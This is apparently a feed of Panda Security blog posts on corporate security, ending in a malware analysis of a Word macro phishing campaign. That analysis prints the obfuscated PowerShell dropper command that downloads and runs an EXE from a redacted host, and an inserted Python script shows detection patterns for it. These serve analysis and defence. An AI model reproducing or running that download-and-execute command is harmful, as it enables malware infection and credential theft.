Keychain, Apple’s Cloud-Based Tool That Safeguards Your Data

Safeguarding your company’s confidential information, in many cases, calls for having your employees create and properly manage a series of passwords. Not only should they choose complex credentials, but those credentials should also differ from one another. And they definitely should not be saved in easily accessible places, like a text document.

Password managers come in handy in this task that is so indispensable to corporate security. For their part, companies that have Apple devices for their employees have the Keychain as an ally: it is a password manager in the cloud that makes things really easy when defending corporate privacy via robust password selection.

Activating this tool is simple: just go to iCloud Settings from an iPhone or an iPad and activate the Keychain option. From a Mac you go to the “System Preferences” menu.

Once activated, all the passwords used by the employee will be stored in iCloud, with its own encryption. Once uploaded to the cloud, it will be possible to use those credentials on all devices that are synchronized and authorized to do so.

However, the Apple Keychain is much more than just a place to store passwords in the cloud. In fact, it allows users to completely forget about the clutter of having several passwords since, when they sign up for the service, the keychain suggests complex options distinct from those already used and automatically saves them. No need to commit anything to memory.

It is also possible to store credit card data and certificates to sign documents digitally. Thus, Apple encryption and its cloud service are one hundred percent responsible for security on the platforms used by employees.

By combining this tool with the right protection to avoid threats, your company’s confidential information will be safer. It makes sure that your passwords are secure and that they will not be stored remotely in any place. And those who want to spice up their passwords can still edit them (or delete old ones) to make them even more complex. When corporate security is at stake, it can never hurt to add extra layers of protection.

The post Keychain, Apple’s Cloud-Based Tool That Safeguards Your Data appeared first on Panda Security Mediacenter.

Android and Linux, the Technologies with the Most Security Holes in 2016

The latest version of Google’s mobile operating system, Android Nougat, has quite a few security improvements over older versions and, in fact, its arrival on the market is more than necessary. Not for nothing, Android has managed to win the dubious honor of being the product with the most security vulnerabilities discovered in 2016.

According to the ranking carried out by the CVE Details digital platform, more than five hundred holes were found in Google’s mobile operating system over the past year. To be exact, there were 523 security errors that put its more than 1.5 billion users at risk.

So Android has overtaken Apple. In 2015, the operating system of Apple computers, Mac OS X, had the greatest number of vulnerabilities to its credit. However, this year Cupertino seems to have done its homework. It has gone from leading last year’s ranking with more than 400 vulnerabilities to closing out 2016 at number eleven on the list, with little more than 200 holes identified throughout the year.

So it turns out having a mobile fleet in your company comprised of Android phones can pose a real risk if you don’t have the right protection. In addition, it is important to update each device to the latest version possible, which ultimately will depend on the manufacturer (some are quicker than others, and all are abandoning their older models completely). It’s no wonder there are more than 300 million Android devices that no longer even receive security patches.

Two Linux distributions, Debian and Ubuntu, are the technological products that join Android on the podium of the most error-riddled software. Throughout 2016 over 300 vulnerabilities were found in Debian, while the other distribution came in third place with almost 280 errors.

Choosing your company’s technological tools can be key to preserving both your safety and that of your customers. However, not many are able to escape vulnerabilities: operating systems like Windows 10, browsers such as Google Chrome, or software giants like Adobe are also among the twenty products with the most vulnerabilities discovered in 2016.

When Ransomware Comes Knocking at Your Door… or Locks it

A lot of things can go wrong on your holidays, like losing luggage or missing a flight, forgetting your travel documents or getting sick at the worst possible time. But have you ever been locked out of your hotel room because of a cyberattack?

That’s just what happened to guests at a luxury hotel in Austria when they were left stranded outside of their rooms after a ransomware attack that overrode electronic key systems.

This concept, which can be summed up as “if you don’t pay, your guests won’t be able to get into their rooms”, underscores a strategy shift in ransomware. Instead of attacking the hotel chain directly, cybercriminals are looking to increase profitability by compromising the well-being of paying customers.

The Evolution of Cyberattacks against Hotels

Infected computers and POS systems, credit card theft, access to confidential information… in the age of the Internet of Things and smart homes, these attacks are becoming commonplace or even antiquated.

Clearly the attacks that this industry has been experiencing are not something casual or fleeting. Behind them lies a real economic interest and a preoccupation with stealthy operations. The hotel sector has become a major target for organized cybercriminals in possession of malware specifically designed to disrupt its smooth running, not only in payment systems, but also by sealing off access to your room, turning lights on and off, or locking your blinds.

This is, undoubtedly, a worrisome situation that could cause significant harm not only on an economic level, but also a PR level, sowing fear among clientele.

Taking appropriate measures is a matter of necessity. Hotels are being forced to reinforce the security of their networks, devices, and systems to avoid becoming victims of this kind of attack. But not all protection systems offer the same level of security, nor are they all valid for any kind of business environment.

Traditional antiviruses are not effective against these attacks, since they are specifically tailored to the victim and are cleaned of all recognizable malware signatures before being launched. Current anti-malware solutions use proactive technology that relies on these signatures to catch malware, rendering them useless against attacks that actively avoid incorporating traits recognizable to these solutions. That’s why it is vital to have advanced cybersecurity protection like Adaptive Defense 360, one that can activate protection systems before the malware is even able to run.

Is WhatsApp safe to use or does it have a backdoor?

Last week an article from The Guardian stated that a backdoor within the end-to-end encryption of popular messaging app WhatsApp could be used by governments to snoop on users. The author “warned it could be used by government agencies as a backdoor to snoop on users who believe their messages to be secure.” This caused quite a stir in security circles, which resulted in a group of cryptography and security experts calling for a retraction and an apology for misleading claims.

Only 3% of the Apps on Your Company iPhones are Secure

Since the 1st of January, the iPhones in your mobile device fleet are even more secure. Or, at least, they should be based on Apple’s most recent requirements for developers. With the beginning of the new year, all apps that haven’t incorporated the App Transport Security (ATS) function will be unable to offer updates through the official store.

With the ATS system, Apple is attempting to force developers to offer apps that manage data more securely. This new feature requires, among other things, that all web connections from the app use the HTTPS protocol.

That way, the information will travel exclusively on an encrypted network, avoiding the most common risks. Paired up with the right protection, this measure taken by Apple could turn iPhones into one of the best options for company mobile devices.

But it’s not as simple as it may seem on the surface. For now, developers are not quite dancing to Apple’s tune. In fact, a recent study has revealed that only 3% of the 200 most downloaded apps for iOS have already implemented ATS.

This figure is disconcerting. Some other conclusions of the study are also worrisome: about 83% of these 200 popular applications have completely disabled ATS and 55% still allow the use of unencrypted HTTP connections.

Moreover, among the popular apps that have not yet embraced the Apple system are some corporate tools that are common in company mobile phones, such as Microsoft Office products, Facebook and even WhatsApp.

The truth is that Apple is not cracking down too hard on developers in the application of these new rules. In fact, before January 1, developers were able to request justified exceptions that exempt them from adhering to ATS.

Since the beginning of the year, users have been able to continue to use these applications that are frankly not as safe as they should be. The only penalty imposed is to be banned from updating your app until you comply with ATS.

Accordingly, your employees should look for alternative applications that have adopted Apple’s latest security feature. Otherwise, they will not only be using unencrypted connections to deal with corporate data, but will also have their mobile devices plagued with un-updateable programs unable to incorporate changes against future vulnerabilities.

Chatbots Take Businesses By Storm

They’re not human, but they sure seem like they are when we chat with them. Chatbots will become virtual butlers of many companies thanks to their ability to process natural language. Companies like Facebook are promoting their use. For the last few months, Facebook has allowed third parties to create bots for its Messenger app. Slack, Telegram, and Line have also opened their API (the window that allows other applications to communicate with each other) to make room for bots.

Companies can also use these intermediaries to increase the productivity of their workers. For example, Howdy allows you to organize meetings and manage the team without leaving the famous Slack corporate communication platform.

They can also be a new customer service channel, either by integrating them in one of these platforms or including them in their own corporate website. In the United States, Uber already allows you to request a car through Facebook Messenger.

But let’s take a step back for a moment. Although the bot trend is going to become a multi-million dollar business, the truth is that they can also be a new way for cybercriminals to commit their misdeeds. In fact, they can become a weapon in the service of phishing, one that is more dangerous than traditional emails.

After all, we are already well aware that when we receive an email we have to verify the source. But if a chatbot starts talking to one of our employees or one of our clients, usurping our company’s name, it will be a lot easier for users to fall into its trap.

A New Tool for Phishing

If the person on the other end of a conversation with a chatbot has no way of knowing whether or not they’re speaking to a human, it’s easier to get a victim to click a link after several minutes of casual conversation. By doing so, the user can be redirected to a fraudulent website that uses social engineering techniques to request confidential data.

In fact, cyberattackers may not even have to come up with that fraudulent website. If they just want to get some private information from a user, they may simply ask for it.

Another option is that the link, instead of serving as a con in itself, directs employees to a webpage that automatically downloads malware — a particularly serious situation if the victim is using the company’s computer. It is advisable to be well protected with an advanced cybersecurity solution.

The security of the channel itself is another factor to take into account when using a chatbot. Facebook announced a few months ago the implementation of end-to-end encryption in Facebook Messenger to prevent third parties from having access to a conversation.

However, other platforms that integrate these virtual butlers may not use that method. Care must be taken with the kind of information we provide to these intermediaries. The fact that they sound human can cause us to end up giving them too much information.

Undoubtedly, chatbots will improve the way we work and the way we communicate with our customers. But their popularization also brings with it new threats in the area of cybersecurity.

Malware Capable of Paralyzing an Entire Ministry Neutralized

Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets.

The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous. These are trends that we are predicting for 2017.

Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan.

The attack was sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.

The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.

Characteristics

Below are a few static properties of the analyzed files.

The hashes of the Word document are the following:

MD5:  B480B7EFE5E822BD3C3C90D818502068

SHA1:  861ae1beb98704f121e28e57b429972be0410930

According to the document’s metadata, the creation date was 2016-12-19. The hashes of the malicious code downloaded by Word are the following:

MD5:  3ea61e934c4fb7421087f10cacb14832

SHA1:  bffb40c2520e923c7174bbc52767b3b87f7364a9


Implementation

1. Infection Vectors

The Word document gets to the victim’s computer by way of a spam email that appears to come from a healthcare company. The text tricks the recipient into believing that the content is protected and that the macro must be run in order to gain access to it.

[Image: screen capture of the actual message]

According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.

The majority of recipients attempted to open the Word document the same day they received it, December 19.

 

[Image: map of countries affected by the spam campaign]

2. Interactions with the infected system

The basic function of the macro consists of downloading and running another piece of malicious code from a URL embedded in the macro itself.

Both the macro and its strings are obfuscated. Also, the macro is designed to run as soon as the document is opened.

[Image: part of the obfuscated code contained in the macro]

Once the macro is running, the Word doc runs the following command in the system:


cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:Users????AppDataRoaming.Exe’);STaRt-PRoCESS ‘C:Users????AppDataRoaming.eXe’


The command prompt (cmd.exe) runs PowerShell with two embedded commands passed as parameters:

  1. The first PowerShell command downloads an EXE from this URL (to %APPDATA%.exe): http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
  2. This generates a file in the root of APPDATA.
  3. The next PowerShell command (Start-Process) is used to run the downloaded file.
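Detection logic for the process chain described above, added here as an example and not part of Panda’s analysis: it scores process-creation events on the traits of that command line after undoing the mixed case and padding. The event fields, host names, parent paths, weights and threshold are assumptions of this example.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Traits of the command line described above. PowerShell accepts unambiguous
# parameter prefixes, so the parameter patterns accept shortened names too.
TRAITS = {
    "policy_bypass": re.compile(r"-(ep|ex\w*)\s+bypass"),
    "no_profile": re.compile(r"-nop\w*"),
    "hidden_window": re.compile(r"-w\w*\s+hidden"),
    "webclient_download": re.compile(r"net\.webclient\)?\.downloadfile"),
    "runs_download": re.compile(r"start-process"),
}
# Command line as printed in the analysis (URL and user name redacted there).
DROPPER = ("pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle"
           "    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE("
           "'http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe',"
           "'C:Users????AppDataRoaming.Exe');"
           "STaRt-PRoCESS 'C:Users????AppDataRoaming.eXe'")
# Constructed process-creation events; hosts and parent paths are made up.
EVENTS = [
    {"host": "pc-01", "parent": r"C:\Office\WINWORD.EXE",
     "cmdline": "cmd.exe /c " + DROPPER},
    {"host": "pc-01", "parent": r"C:\Windows\System32\cmd.exe", "cmdline": DROPPER},
    {"host": "pc-02", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"host": "pc-03", "parent": r"C:\Office\WINWORD.EXE",
     "cmdline": r"C:\Windows\splwow64.exe 8192"},
]


def normalize(cmdline):
    """Undo the case and spacing tricks: lower-case and collapse whitespace."""
    return re.sub(r"\s+", " ", cmdline.lower())


def score_event(event):
    """Return (score, traits) for one event; an Office parent adds three points."""
    cmd = normalize(event["cmdline"])
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(cmd))
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if parent in OFFICE_PARENTS and "powershell" in cmd:
        return len(hits) + 3, hits + ["office_parent"]
    return len(hits), hits


def detect(events, threshold=4):
    """Return (host, score, traits) for every event at or above the threshold."""
    scored = [(e["host"], *score_event(e)) for e in events]
    return [row for row in scored if row[1] >= threshold]


if __name__ == "__main__":
    for host, score, hits in detect(EVENTS):
        print(host, score, ", ".join(hits))
```

Both halves of the chain on pc-01 are reported, while the administrator script on pc-02 and the print helper spawned by Word on pc-03 stay below the threshold.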

Thanks to the data obtained by Panda Security’s Collective Intelligence, we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without the need for signatures or updates.

The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to a bot network. It then waits for commands from the Command & Control Server. These commands come from the cybercriminals who operate it, and the malware is able to download further malware and carry out all kinds of malicious actions.

Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight.
